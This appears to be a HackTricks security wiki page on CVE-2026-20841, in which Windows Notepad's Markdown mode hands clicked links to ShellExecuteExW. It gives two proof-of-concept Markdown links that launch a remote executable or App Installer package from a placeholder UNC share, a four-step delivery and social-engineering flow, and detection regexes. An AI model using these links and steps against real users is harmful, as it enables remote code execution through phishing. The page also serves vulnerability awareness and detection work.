// HackTricks · Windows

Windows Protocol Handler / ShellExecute Abuse (Markdown Renderers)

Windows Protocol Handler / ShellExecute Abuse (Markdown Renderers)

Windows applications that render Markdown or HTML may hand clicked targets to ShellExecuteExW. Because ShellExecute dispatches registered URI schemes and file associations, a renderer needs an explicit allowlist rather than assuming every link is HTTP(S). The Notepad behavior below describes CVE-2026-20841 and should not be generalized to every renderer.[1][3]

ShellExecuteExW surface in Windows Notepad Markdown mode

  • Notepad chooses Markdown mode only for .md extensions via a fixed string comparison in sub_1400ED5D0().[1]
  • Supported Markdown links:
    • Standard: [text](target)
    • Autolink: <target> (rendered as [target](target)), so both syntaxes matter for payloads and detections.
  • Link clicks are processed in sub_140170F60(), which performs weak filtering and then calls ShellExecuteExW.
  • ShellExecuteExW dispatches to any configured protocol handler, not just HTTP(S).[1]

Payload considerations

  • Any \\ sequences in the link are normalized to \ before ShellExecuteExW, impacting UNC/path crafting and detection.
  • .md files are not associated with Notepad by default; the victim must still open the file in Notepad and click the link, but once rendered, the link is clickable.
  • Dangerous example schemes:[1]
    • file:// to launch a local/UNC payload.
    • ms-appinstaller:// to trigger App Installer flows. Other locally registered schemes may also be abusable.

Minimal PoC Markdown

[run](file://\\192.0.2.10\\share\\evil.exe)
<ms-appinstaller://\\192.0.2.10\\share\\pkg.appinstaller>

Exploitation flow

  1. Craft a .md file so Notepad renders it as Markdown.
  2. Embed a link using a dangerous URI scheme (file:, ms-appinstaller:, or any installed handler).
  3. Deliver the file (HTTP/HTTPS/FTP/IMAP/NFS/POP3/SMTP/SMB or similar) and convince the user to open it in Notepad.
  4. On click, the normalized link is handed to ShellExecuteExW and the corresponding protocol handler executes the referenced content in the user’s context.[1][2]

Detection ideas

  • Monitor transfers of .md files over ports/protocols that commonly deliver documents: 20/21 (FTP), 80 (HTTP), 443 (HTTPS), 110 (POP3), 143 (IMAP), 25/587 (SMTP), 139/445 (SMB/CIFS), 2049 (NFS), 111 (portmap).
  • Parse Markdown links (standard and autolink) and look for case-insensitive file: or ms-appinstaller:.
  • Vendor-guided regexes to catch remote resource access:
(\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4}
(\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2}
  • The vendor fix described by ZDI restricts accepted targets to local files and HTTP(S). Extend detections to other installed protocol handlers as needed because the registered attack surface varies by system.[1]

References